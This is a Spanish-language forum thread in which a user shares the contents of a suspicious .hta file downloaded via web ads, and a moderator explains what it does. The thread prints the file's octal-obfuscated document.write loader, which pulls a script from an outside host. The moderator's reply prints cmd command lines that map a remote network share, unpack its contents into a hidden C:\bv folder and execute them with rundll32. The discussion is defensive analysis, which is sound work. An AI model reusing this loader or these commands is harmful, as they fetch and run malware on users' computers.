elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  Nuevo malware via archivo HTA
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Nuevo malware via archivo HTA  (Leído 93 veces)
Flamer


Desconectado Desconectado

Mensajes: 1.059


crack, crack y mas crack...


Ver Perfil WWW
Nuevo malware via archivo HTA
« en: Hoy a las 00:07 »

Hola he estado navegando en algunas paginas y me salen publicidad y de repente se descargan archivos zip o 7z y al descomprimirlo aparece un archivo .hta...bueno al abrirlo contiene lo siguiente

Código:
<script>



document.write("\154\074\163\143\162\151\160\164\040\163\162\143\075\150\164\164\160\163\072\057\057\063\141\071\143\060\071\066\064\056\160\162\145\143\162\145\141\164\151\166\145\056\160\151\143\163\057\061\165\164\066\151\065\166\143\144\070\064\152\065\076\074\057\163\143\162\151\160\164\076\152\144\145\154")


</script>

asi que no lo ejecute..... cambie el document.write por un alert aver que imprimia y sale esto



por lo que veo redirige a una pagina... pero no entiendo como el atacante puede infectar mi computadora tiene algun bug los archivos hta al visitar dicha web... no entiendo

saludos Flamer y mi navegador chrome me lo marca como peligroso
En línea

Mi Canal De Youtube y Blog

https://elblogdeflamer.blogspot.com

EdePC
Moderador Global
***
Desconectado Desconectado

Mensajes: 2.226



Ver Perfil
Re: Nuevo malware via archivo HTA
« Respuesta #1 en: Hoy a las 04:37 »

los hta son un peligro, puedes ejecutar comandos CMD ahí mismo y con eso haces de todo

Por lo que vi hace un "net use" para añadir una carpeta compartida desde Internet, luego descomprime lo que hay en esa carpeta compartida en otra carpeta oculta que crea en C:\, y empieza a ejecutar todo eso que descomprimió.

"C:\Windows\System32\cmd.exe" /c timeout 135 && forfiles /p c:\bv\ /m *.* /s /c "cmd /c rundll32 @path,ejm"

"C:\Windows\System32\cmd.exe" /c md c:\bv && attrib +h c:\bv && net use n: \\1p.si@ssltxf\t && forfiles /p n:\ /m *.* /s /c "cmd /c expand -r @path c:\bv" && net use n: /d /y
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Archivo de la practica del taller de malware
Seguridad
skapunky 2 4,814 Último mensaje 2 Febrero 2012, 13:36 pm
por skapunky
Nuevo malware en Android
Noticias
wolfbcn 0 1,510 Último mensaje 15 Julio 2013, 14:44 pm
por wolfbcn
Un nuevo malware aterra a los usuarios de Mac
Noticias
wolfbcn 2 2,041 Último mensaje 15 Noviembre 2013, 05:08 am
por Vaagish
Oleada de spam con malware como archivo adjunto
Noticias
wolfbcn 0 1,351 Último mensaje 29 Enero 2014, 21:38 pm
por wolfbcn
¿como se inyecta un malware e un archivo ?
Análisis y Diseño de Malware
barryrompiero 3 4,366 Último mensaje 5 Febrero 2016, 22:36 pm
por Br1ant
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines